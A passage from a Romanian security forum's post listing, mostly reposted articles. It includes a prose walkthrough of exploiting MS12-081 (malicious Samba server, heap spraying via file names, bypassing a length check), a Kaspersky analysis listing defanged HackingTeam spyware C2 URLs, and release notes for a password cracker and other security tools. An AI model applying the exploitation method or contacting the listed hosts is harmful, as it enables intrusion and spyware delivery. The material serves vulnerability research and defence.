vulnerable Windows machine a directory listing with file names, which length exceeds 255 characters. The function smbd_marshall_dir_entry from trans2.c (Samba 3.6.6), which partially forms the server task, is one of the holes for malware injection. For the first test, the name of the output files was extended over 0x100 bytes and filled with the constant 0xfeeddead. Trying to use a modified server from a vulnerable machine, you can see the following. The screenshot shows that explorer.exe tried to read DWORD by the address from the EDX register. The read value participates in creating an address for the call. It's easy to see ascending the call stack that the first two parameters of the function RecentDocs_Enum are under control, besides they are rendered further. These values can be rewritten because they are located in a stack (see the scheme below). The function CFSFolder_CreateEnum allocates memory of size 0x498 for an instance of the class CFileSysEnum; this chunk contains the structure WIN32_FIND_DATA with offset 0x224. A pointer to this structure is transferred to the vulnerable function FindFirstFileEx, which rewrites the values that allow control hijacking. It is necessary to conduct a heap-spray attack to exploit this vulnerability. File names received by CShellBrowser2 are the objects for heap spraying in this case. Therefore, it is needed to create a lot of files on a shared network resource to conduct a heap-spray attack. The figure below provides the attack scheme. Note: the DEP (Data Execution Prevention) system is not considered in this scheme; it is evident that shellcode is in the heap, which should not be executable. One of the attack problems is server response fragmentation into several SMB packets. The driver mrxsmb.sys responsible for the SMB protocol includes the function MrxSmbUnalignedDirEntryCopyTail. This function checks the length of received names transferred to the user mode. If the limit of 0x200 bytes is exceeded, the function will display the error STATUS_INVALID_NETWORK_RESPONSE (0xC00000C3), and then NtQueryDirectoryFile will stop sending names for FindNextFile. This check can be bypassed as follows. First of all, it is necessary to create a set of files, which will conduct the heap-spray attack, and then to remove all the files from the directory and create a file, the name of which is the vulnerability trigger. The Samba server, in case of changes in the file system with a connected server, will send a packet with the function NT_NOTIFY, which will make the client repeat the request FIN_FIRST2 to the server having received only one malware name. Besides, the file names received earlier will remain in memory. Moreover, it is possible to control the order of the names, because they are sorted by name. It is worth noting that the names received from the Samba server should be unique; it is provided by allocating 5 bytes from the main file name field to the unique identifier. It is also worth noting that the file name transport supports interaction via the SMB protocol in double-byte Unicode. It restricts addresses rewritten on the vulnerable client, but due to the fact that the Samba server output is modified after conversion of single-byte to double-byte characters, these restrictions are insignificant, though they complicate the modified server's running process. Sending a big data packet, the server divides it into parts, and the client having received another such data part sends the sever a name, starting with which it should proceed the transaction (see the figure below). Due to the fact that when conducting the heap-spray attack unreal data is output, then the name to continue the output will be unreal as well. That is why it is needed to render the received continue_name in a real name on the server, with which it is necessary to continue. This construction allows code execution on a vulnerable machine with probability 1/7. Finally, we should say that the vulnerability can be easily exploited "in a wild life", though for creation of a combat exploit, one will have to solve the problem with DEP and find optimizing algorithms for heap spraying (to increase the probability of success). Author: Kirill Nesterov, Positive Research. Sursa: Positive Research Center: Surprise for Network Resources from kernel32 (MS12-081, Detailed Analysis of Vulnerability in Microsoft File Handling Component)
  15. Nytro
    Cred ca e ok, adica probabil se face media voturilor, iar cum in cazul acela e un singur vot, de 5, inseamna ca si media e tot 5.
  16. Nytro
    [h=3]Atmel SAM7XC Crypto Co-Processor key recovery (with bonus Mifare DESFire hack)[/h]The problem with crypto is that it is processor intensive (i.e. slow), so it's common, these days, to offload these functions to a dedicated hardware co-processor which will leave the main processor free to do whatever it is that it's supposed to be doing and not faffing about with crypto. This is good in theory, as it means that cryptographic protection can be added to more or less any system without having to worry that it's going to add an unacceptable level of load to the processor. It is also theoretically more secure as the crypto keys are safely tucked away in a dedicated secure store. Much is made of this additional level of security in marketing literature. But theory is all well and good - the bitch is getting it right in practice... The following is the result of an audit performed for a client and is published with their full knowledge and consent. There are a couple of ways you can attack a crypto system: go after the algorithm itself, or go after a specific implementation. To crack the algorithm, you generally need to be a very good mathematician (and more likely a cryptographer). Crypto algorithms are thought about long and hard, and specifically designed to be impervious to this kind of attack, so, although they don't always get it right, it is certainly not going to be an easy task to find the fundamental flaw (if any exists). The other way, to go after a specific implementation, is much more likely to bear fruit and will usually be a whole lot easier, and can therefore be attempted by the likes of you and me. This is because in crypto the devil is in the detail, and as a system gets more complicated there is a lot more detail to take care of and therefore a lot more avenues of attack. One of the specific issues crypto brings with it is the problem of managing the keys. The keys are literally the keys to your kingdom, and if you lose them you lose everything, so my first question is always: what keys are we after, and where can I find them? Our target today is an access control system that uses a Mifare DESFire EV1 card as it's token. The microprocessor in the control unit is the Atmel AT91SAM7XC256, which is part of Atmel's ARM based SAM7XC series. It has a crypto co-processor, which includes a write-only memory for the keys, and the whole of the chip's memory can also be locked so that the code cannot be read out. DESFire is a proprietary standard, but if you dig deep enough you'll find everything you're looking for, so it's relatively easy to write code to interrogate these tags and figure out what's on them (libfreefare would be a good place to start). I used my own RFIDIOt library to do so (note that I will always publish code if I can, but unfortunately as the DESFire standard is not open, and some of this tool is under NDA, I cannot in this case. If / when the restriction is lifted I'll be more than happy to do so, but in the meantime please don't ask. Sorry.) Articol: [/FONT]http://oamajormal.blogspot.co.uk/2013/02/atmel-sam7xc-crypto-co-processor-key.html[FONT=Arial]
  17. Nytro
    Adobe Flash Player 0-day and HackingTeam's Remote Control System Sergey Golovanov Kaspersky Lab Expert Posted February 12, 15:01 GMT Last week, Adobe released a patch for a vulnerability in Flash Player that was being exploited in targeted attacks. Before reading any further, we recommend you to take a moment make sure you apply this patch. Adobe offers this nifty tool to check that you have the latest version of Flash Player. If you are running Google Chrome, make sure you have version ‘24.0.1312.57 m’ or later. Now back to CVE-2013-0633, the critical vulnerability that was discovered and reported to Adobe by Kaspersky Lab researchers Sergey Golovanov and Alexander Polyakov. The exploits for CVE-2013-0633 have been observed while monitoring the so-called ‘legal’ surveillance malware created by the Italian company HackingTeam. In this blog, we will describe some of the attacks and the usage of this 0-day to deploy malware from ‘HackingTeam’ marketed as Remote Control System. HackingTeam and RCS We previously wrote about RCS (Remote Control System) and HackingTeam and over the past few months, we’ve closely monitored the usage of the RCS (aka as ‘DaVinci’) against human rights activists and political dissidents from Africa, South America and the Middle East. We also presented the findings of this investigation last week at Kaspersky Lab’s SAS 2013 in a presentation named “Cyber Cosa Nostra”, which details the connections between HackingTeam with the shady organization known as ‘OPM’. An article documenting the findings will be published later this month on Securelist. During our investigation, we discovered several ways through which the RCS malware was installed onto the victims’ computers: 1. Self-signed JAR 2. CVE-2012-4167: (0-day from ‘Vupen’, see NYS OCS Advisory #2012-073 (09/26/2012) - Vulnerability in Adobe Flash Player Could Allow For Remote Code Execution (APSB12-19) -. ~3 months ITW before publishing ). Used with C2: hxxps://www.maile-s.com/yarab/stagedocJord 3. CVE-2010-3333: C2 at hxxps://ar-24.com/0000000031/veryimportant.doc2 + hxxp://rcs-demo.hackingteam.it/0000000001/exploit.doc2 4. CVE-2012-5054: (0-day Vupen, see Adobe Flash Player Matrix3D Integer Overflow Code Execution ? Packet Storm. ItW for ~3 months before patching) - used with C2 at: hxxp://176.58.100.37/0000040037/scandale.doc 5. CVE-2012-1682: (0-day. Security Explorations ~2 months ITW before publishing )- hxxp://ar-66.com/installer.jar 6. CVE-2013-0633: 0-day, previously unknown Some of these infection vectors were previously described in great detail by Citizen Lab Security Researcher Morgan Marquis-Boire, in relation to RCS and also another malware known as 'SPY_NET'. Interestingly, from the list above, two of the 0-days appear to have been created by the French offensive security company Vupen. The link was also previously pointed out by Citizen Lab’s report, which says it’s unclear if the exploits used with HacktingTeam’s malware have been purchased from Vupen, or just engineered in parallel. CVE-2013-0633 We came by CVE-2013-0633 while analysing a number of targeted attacks which appeared to be deploying the malware Backdoor.Win64.Korablin.a, which is the Kaspersky detection name for HacktingTeam’s ‘DaVinci’ package for Windows (Mac versions is called “Backdoor.OSX.Morcut”). The attacks employed Word documents which used multiple stages to deliver the malware to the target system. Although we do not have the original documents used in the attacks, we’ve identified several locations from which the 2nd and 3rd stage were delivered. Here’s a list of command servers which were used as C2 to deliver the exploits, as hardcoded in the shellcode used in the second stage of the attack: hxxp://li565-84.members.linode.com/0000000097/worddocument.doc3 hxxp://li565-84.members.linode.com/0000000093/worddocument.doc3 hxxp://li565-84.members.linode.com/0000000093/word_document.doc3 hxxp://li565-84.members.linode.com/0000000098/worddocuments.doc3 (a Linode server in Japan) Previously, we’ve seen attacks using other C2s as well: 76.162.33.13/stagedocsis www.wiki-islam.info/new/stagedocbn ww.faddeha.com/palestine27/stagedocpal wiki-arab.com/index/stagedocwinword ->>>> close[CENSORED].com/7-2012/stage2 (LIVE MALWARE, censored) 192.168.100.100/0000000788/info.doc2 173.255.215.193/napoli/napoli/stage2 The malware installed by these exploits is signed with a valid certificate from various entities around the world: (Digital certificate belonging to “Kamel Abed” used to sign the ‘RCS’ malware dropper) How widespread are these attacks? Here’s a map of detections for Backdoor.Win32/64.Korablin.a: During the monitoring period, we observed about 50 incidents from countries such as Italy, Mexico, Kazakhstan, Saudi Arabia, Turkey, Argentina, Algeria, Mali, Iran, India and Ethiopia. As it usually happens with such dubious software, it’s impossible to say who uses them and for what purpose. The problem with so-called ‘legal’ spy tools is that any government can purchase them, including governments from countries with a poor human rights records. Additionally, one government can purchase these tools and use them against another country. The link between HackingTeam and Vupen During our investigation, we observed at least two 0-days which are credited to Vupen that have been used in attacks with DaVinci/RCS. We do not know if the exploits have been discovered and created in parallel by both teams or if HackingTeam is just one of Vupen’s customers. Nevertheless, it appears there is a link between the two companies in the sense that malware written by HackingTeam is commonly deployed using Vupen 0-days. The future Following the publication of Citizen Lab’s blog From Bahrain with Love: FinFisher’s Spykit Exposed, the U.K. government reaffirmed that existing controls restricting the export of cryptographic systems apply to the Gamma Group’s exports of FinSpy. Although such restrictions exist in the U.K., there is currently little or no information on the regulations in France or Italy regarding the activity of companies that create 0-days and so-called ‘legal’ malware. Even when such regulations exist, the spyware can be easily sold to anyone through umbrella companies in other countries, such as Panama. Based on existing evidence, the victims of such attacks are human rights activists in countries with poor human rights records. It is possible that tools such as FinSpy or RCS lead to the arrest and conviction of people in such countries. We believe that the 'legal spy' industry is the equivalent of a ticking time bomb which can explode at any moment. The lack of regulation, the widespread trading of such dangerous technologies to pretty much anyone who has the money and the fact that they've already been in many dubious cases raises a big question about who will be held liable when the bubble finally bursts. Kaspersky Lab products detect the RCS/DaVinci backdoors as: Backdoor.Win32.Korablin, Backdoor.Win64.Korablin, Backdoor.Multi.Korablin, Rootkit.Win32.Korablin, Rootkit.Win64.Korablin, Rootkit.OSX.Morcut and Trojan.OSX.Morcut. Sursa: Adobe Flash Player 0-day and HackingTeam's Remote Control System - Securelist
  18. Nytro
    [h=1]Hashkill 0.3.1![/h]by Mayuresh on February 12, 2013 “Hashkill is an open-source password recovery tool. Its features are: Multi-threaded so that it can benefit from multi-core/multi-CPU systems SSE2-accelerated algorithms to achieve high speeds on modern x86 CPUs 4 attack modes: dictionary/bruteforce/hybrid/markov 35 plugins for different types of passwords (ranging from simple hashes like MD5 and SHA1 to passworded ZIP files and private SSL key passphrases) Supports session save/restore. Sessions are auto-saved each 3 seconds. Password cracking can resume after the last checkpoint in case the program is stopped/killed/system crashes/power down/etc. Multi-hash support (you may load hashlists of length up to 1 million) Very fast GPU support on Nvidia (compute capability 2.1 cards also supported) and ATI (4xxx, 5xxx and 6xxx). Multi-GPU support. Session save/restore, markov/hybrid/bruteforce on GPUs“ [h=2]List of changes made to Hashkill:[/h] 9 new plugins: bfunix, drupal7, django256, sha256unix, mssql-2012, o5logon, msoffice-old, msoffice, luks. Of them msoffice-old is currently supported on CPU only, the rest are GPU-accelerated Improved build scripts Added a “fastdict” rule clause which enables very fast GPU-offloaded combinator attacks. The limitation is that wordlist candidates of len<=16 can be used. Improved bitmaps handling in non-salted kernels. Now huge hashlists would be cracked at faster speeds Rules that start with “must add str ..” are no more a badass bottleneck for the GPU-offloaded rule attacks Hash type auto-detection. Yes it works (although not 100% correct – in case there are several plugins that can crack that plugin, you will be presented a list of possible options) Added average speed indicator together with the current speed one. New hotkeys while cracking: ‘t’ would display GPU temps, ‘s’ would display short stats Thermal monitoring can now be disabled using -T 0 command-line argument Bugfixes: A new test framework was introduced. This in turn helped me to fix a LOT of bugs in the plugins. This is probably the first (well sort of) _STABLE_ hashkill version. Stack overflow issues were fixed in several plugins’ CPU code Issues with progress indicator inaccuracy were fixed. Critical issue with thermal monitoring which lead to program crashes was solved Large file support for x86 Thread-safety issues in rule engine were fixed that could lead to spontaneous errors Race condition that could lead to a deadlock was fixed Several CPU plugins had bugs that allowed false negatives. Fixed. [h=3]Download Hashkill:[/h] Hashkill 0.3.1 – hashkill-0.3.1-x86_64.tar.gz/hashkill-0.3.1-x86.tar.gz/0.3.1.zip Sursa: Hashkill version 0.3.1! — PenTestIT
  19. Nytro
    [h=1]Netzob 0.4.1![/h]by Mayuresh on February 13, 2013 Our first post regarding Netzob can be found here. Sometime ago, an update - Netzob 0.4.1 – was made available to us. This release has been code named - ”WaddlingPeccary“. While the previous release introduced a large amount of changes, this one focuses on stability, UI, and model export towards Wireshark and Peach Fuzzer. Thanks to the new plugin mechanism, that was introduced in the previous release, some great features such as Wireshark and Peach exporters are now available as plugins, allowing you to dissect and fuzz proprietary protocols with well-known tools. It also added some new dialogs for configuring the workspace and projects, and to manage imported traces. Netzob is an opensource tool which supports the expert in its operations of reverse engineering, evaluation and simulation of communication protocols. Its main goals are to help security evaluators to : Assess the robustness of proprietary or unknown protocols implementation. Simulate realistic communications to test third-party products (IDS, firewalls, etc.). Create an open source implementation of a proprietary or unknown protocol. Netzob supports the expert in a semi-automatic inferring process of any communication protocol. Hence, it includes the necessaries to passively learn the vocabulary of a protocol and to actively infer its grammar. The learnt protocol can afterward be simulated. [h=2]Official change log for Netzob 0.4.1:[/h] In this release, 191 files were changed (10,968 lines added, 4,097 removed). Export plugins Automatic generation of Wireshark dissectors Automatic generation of Peach fuzzers [*]Workspaces and projects Workspace manager Project manager Trace manager [*]Pretty print of XML files [*]Simplify the default Variable [*]Provide extra compile arguments to the build process [h=3]Download Netzob:[/h] NETZOB 0.4.1 – Netzob-0.4.1.tar.gz/Netzob-0.4.1.win32-py2.7.exe Sursa: Netzob 0.4.1 – WaddlingPeccary! — PenTestIT
  20. Nytro
    [h=1]Zed Attack Proxy 2.0.0![/h]by Mayuresh on February 13, 2013 Wow! It’s been some time since we last posted about ZAProxy! Our first post regarding the Zed Attack Proxy or the OWASP Zed Attack Proxy can be found here. Now, an updated Zed Attack Proxy version 2.0.0 was released! This version includes an integrated add-ons marketplace, a new Ajax spider, Session scope, and various other features and improvements have been added. “The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox. ZAProxy provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.” [h=2]Zed Attack Proxy 2.0.0 official change log:[/h] An integrated add-ons marketplace: ZAP can be extended by add-ons that have full access to all of the ZAP internals. Anyone can write add-ons and upload them to the ZAP Add-on Marketplace (OK, so its a Google code project called zap-extensions, but you get the idea).More importantly you can now browse, download and install those add-ons from within ZAP. Most add-ons can be dynamically installed (and uninstalled) so you wont even need a restart.You can choose to be notified of updates, and even be automatically updated. And as the scan rules are now implemented as add-ons you can get the latest rules as soon as they are published. A replacement for the ‘standard’ Spider: The ‘old’ Spider was showing its age, so its been completely rewritten, and is much faster and more comprehensive than the old one. This is still a ‘traditional’ spider that analyses the HTML code for any links it can find. A new ‘Ajax’ spider: In addition to the ‘traditional’ spider we’ve added an Ajax spider which is more effective with applications that make heavy use of JavaScript. This uses the Crawljax project which drives a browser (using Selenium) and so can discover any links an application generates, even ones generated client side. Web Socket support: ZAP now supports WebSockets, so ZAP can now see all WebSocket messages sent to and from your browser. As with HTTP based messages, ZAP can also intercept WebSocket messages and allows you to change them on the fly. You can also fuzz WebSockets messages as well using all of the fuzzing payloads included in ZAP from projects like JBroFuzz and fuzzdb. And of course you can easily add your own fuzzing files. Quick Start tab: The first main tab you will now see is a ‘Quick Start’ tab which allows you to just type in a URL and scan it with one click. This is an ideal starting point for people new to application security, but experts can easily remove it if they find it distracting. Session awareness: ZAP is now session aware, so it can recognise and keep track of multiple sessions. It allows you to create new sessions, switch between them, and applies to all of the other components, like the Spider and Active Scanner. User defined Contexts: You can now define any number of ‘contexts’ – related sets of URLs which make up an application. You can then target all URLs in a context, for example using the Spider or Active Scanner. You can also add the contexts to the scope, and associate other information, such as authentication details. Session scope: The session scope allows you to specify which contexts you are interested at any one time. You can restrict what you see in various tabs to just the URLs in scope, and prevent accidentally attacking URLs not in scope by using the Protected mode. Different modes: ZAP now supports 3 modes: Safe, in which no potentially dangerous operations permitted Protected, in which you can perform any actions on URLs in scope Standard, in which you can do anything to any URLs [*]A scripting console: This allows you to access any internal ZAP data structures dynamically using any scripting language that supports JSR 223, [*]Authentication handling: You can now associate authentication details with any context, which allows ZAP to do things like detect if and when you are logged out and automatically log you back in again. This is especially useful when used via the API in security regression tests. [*]More API support: The REST API has been significantly extended, giving you much more access to the functionality ZAP provides. [*]Fine grained scanning controls [*]The active scan rules can now be tuned to adjust their strength (the number of attacks they perform) and the threshold at which they report potential issues. [*]New and improved active and passive scanning rules [*]We have uploaded the results from running ZAP 2.0.0 against wavsep (the most comprehensive open source evaluation project we are aware of) to the ZAP wiki: TestingWavsep - zaproxy - OWASP ZAP: An easy to use integrated penetration testing tool for finding vulnerabilities in web applications. - Google Project Hosting [*]Many stability and usability fixes [h=3]Download Zed Attack Proxy:[/h] Zed Attack Proxy 2.0.0 – ZAP_2.0.0_Windows.exe/ZAP_2.0.0_Linux.tar.gz/OWASP_ZAP_2.0.0_OSX-b.zip Sursa: Zed Attack Proxy version 2.0.0! — PenTestIT
  21. Nytro
    [h=3]Introducing ModSecurity IIS 2.7.2 Stable Release[/h]swiat 11 Feb 2013 12:44 PM We are pleased to announce the release of a stable version of the open source web application firewall module ModSecurity IIS 2.7.2. Since the announcement of availability of the beta version in July 2012, we have been working very hard to bring the quality of the module to meet the enterprise class product requirements. In addition to numerous reliability improvements, we have introduced following changes since the first beta version was released: optimized performance of request and response body handling added “Include” directive, relative path and wildcard options to the configuration files re-written installer code to avoid .NET Framework dependency and added installation error messages to system event log integrated OWASP Core Rule Set in the MSI installer with IIS-specific configuration fixed about 10 functional bugs reported by ModSecurity IIS users. Microsoft also released recently a TechNet article entitled "Security Best Practices to Protect Internet Facing Web Servers", which explains in details benefits of deploying a WAF module on a web server. [h=3]Integrated OWASP Core Rule Set[/h] In version 2.7.2 of ModSecurity IIS we have included OWASP Core Rules Set pre-configured to serve most common scenarios encountered on IIS server. The rule set gets installed into c:\inetpub\wwwroot\owasp_crs directory, from which it can be included in any web.config file by adding: <ModSecurity enabled="true" configFile="owasp_crs\modsecurity_iis.conf" /> The default setting enables request body access, disables response body access, does not use audit log, and sets temporary files and data folder to c:\inetpub\temp. User can enable or modify these and other features by uncommenting appropriate ModSecurity directives in modsecurity.conf or modsecurity_crs_10_setup.conf files. [h=3]2012 Toolsmith Tool of the Year Award: ModSecurity for IIS[/h] Russ McRee over at HolisticInfosec held open voting in January for the 2012 Toolsmith Tool of the Year Award and ModSecurity for IIS won! We are glad that the Toolsmith readers found value in the IIS version of ModSecurity and we hope that it will help them to quickly mitigate emerging threats to their Microsoft IIS/ASP/.Net environments. [h=3]Acknowledgements[/h] I would like to thank Nazim Lala and Ashish Kurmi from Microsoft for their help in module testing, Breno Silva and Ryan Barnett from Trustwave for continuous support of the IIS version, and Simon Kosinski for his valuable insights and suggestions. Greg Wroblewski, MSRC Sursa: Introducing ModSecurity IIS 2.7.2 Stable Release - Security Research & Defense - Site Home - TechNet Blogs
  22. Nytro
    [h=1]Object Oriented Programming in C#.net[/h]Ajay Yadav February 12, 2013 OOP’s overview Object-oriented programming is the core ingredient of the .NET framework. OOP is so important that before embarking on the road to .NET, you must understand its basic principles and terminology to write even a simple program. The fundamental idea behind OOP is to combine into a single unit both data and the methods that operate on that data,with such units being called an object. All OOP languages provide mechanisms that help you implement the object-oriented model. They are encapsulation, inheritance, polymorphism and reusability. Let’s take a brief look at these concepts: Encapsulation This mechanism binds together code and the data it manipulates, and keeps both safe from outside interference and misuse. Encapsulation is a protective container that prevents code and data from being accessed by other code defined outside the container. Inheritance Inheritance is the process by which one object acquires the properties of another object. A type derives from a base type, taking all the base type members’ fields and functions. Inheritance is most useful when you need to add functionality to an existing type. For example all .NET classes are inherited from System.Object classes, so a class scans its new functionality as well as the existing Object class functions and properties. Polymorphism Polymorphism is a feature that allows one interface to be used for a general class of action. This concept is often expressed as “one interface, multiple actions.” The specific action is determined by the exact nature of circumstances. Reusability Once a class has been written, created and debugged, it can be distributed to other programmers for use in their own program. This is called reusability or, in .NET terminology, this concept is called a component or DLL. However, in OOP, inheritance provides an important extension to the idea of reusability. A programmer can take an existing class and without modifying it, add more features to it. Articol: http://resources.infosecinstitute.com/object-oriented-programming-in-c-net/
  23. Nytro
    Cateva detalii despre unu: MS13-018: Hard to let go - Security Research & Defense - Site Home - TechNet Blogs
  24. Nytro
    [h=1]Microsoft Security Bulletin Summary for February 2013[/h] Published: Tuesday, February 12, 2013 | Updated: Tuesday, February 12, 2013 Version: 1.1 This bulletin summary lists security bulletins released for February 2013. With the release of the security bulletins for February 2013, this bulletin summary replaces the bulletin advance notification originally issued February 7, 2013. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification. For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications. Microsoft is hosting a webcast to address customer questions on these bulletins on February 13, 2013, at 11:00 AM Pacific Time (US & Canada). Register now for the February Security Bulletin Webcast. After this date, this webcast is available on-demand. Microsoft also provides information to help customers prioritize monthly security updates with any non-security updates that are being released on the same day as the monthly security updates. Please see the section, Other Information. Informatii: http://technet.microsoft.com/en-us/security/bulletin/ms13-feb Interesante: Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 Microsoft Security Bulletin MS13-011 - Critical : Vulnerability in Media Decompression Could Allow Remote Code Execution (2780091) Microsoft Security Bulletin MS13-006 - Important : Vulnerability in Microsoft Windows Could Allow Security Feature Bypass (2785220) Microsoft Security Bulletin MS13-015 - Important : Vulnerability in .NET Framework Could Allow Elevation of Privilege (2800277) Microsoft Security Bulletin MS13-017 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494) Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 Microsoft Security Bulletin MS13-018 - Important : Vulnerability in TCP/IP Could Allow Denial of Service (2790655) Microsoft Security Bulletin MS13-019 - Important : Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege (2790113) Microsoft Security Bulletin MS13-004 - Important : Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2769324) Microsoft Security Bulletin MS13-005 - Important : Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) Microsoft Security Bulletin MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) Microsoft Security Bulletin MS12-057 - Important : Vulnerability in Microsoft Office Could Allow Remote Code Execution (2731879) Updatati-va Windowsu.
  25. Nytro
    Pe noi nu ne viziteaza [TABLE=class: tborder, width: 90%, align: center] [TR] [TD=class: tcat, colspan: 2, align: center]IP Address Search for IP Address: "153.31" [/TD] [/TR] [TR] [TD=class: alt1, colspan: 2]153.31 : Could Not Resolve Hostname[/TD] [/TR] [TR] [TD=class: thead, colspan: 2]Post IP Addresses[/TD] [/TR] [TR] [TD=class: alt2, colspan: 2]No Matches Found[/TD] [/TR] [TR] [TD=class: thead, colspan: 2]Registration IP Addresses[/TD] [/TR] [TR] [TD=class: alt1, colspan: 2]No Matches Found[/TD] [/TR] [/TABLE] A, pula, am uitat ca am sters IP-urile...
×
×
  • Create New...